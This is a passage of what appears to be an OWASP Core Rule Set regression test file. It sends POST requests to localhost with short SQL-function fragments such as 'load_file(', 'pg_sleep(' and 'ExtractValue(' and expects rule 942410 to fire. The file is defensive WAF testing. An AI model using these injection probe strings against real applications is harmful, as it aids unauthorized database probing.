text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "date(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=default%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=format%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 45 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 46 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 47 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 48 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 49 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 50 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 51 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 52 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 53 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 54 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 55 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 56 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 57 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=local%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 58 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 59 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 60 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 61 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 62 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 63 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 64 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 65 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 66 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 67 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 68 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "name_const(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 69 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "now(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 70 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "nOW(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 71 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ord(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 72 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password?(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 73 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password/?(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 74 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Password>$(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 75 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 76 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pi(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 77 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "PI(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 78 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pow(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 79 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "POW(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 80 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "quarter. (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 81 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rand(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 82 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Rand (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 83 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RAND(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 84 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "replace(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 85 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "REPLACE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 86 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 87 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 88 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rtrim(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 89 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RTRIM(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 90 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sin (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 91 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SIN(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 92 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 93 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SLEEP (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 94 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 95 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
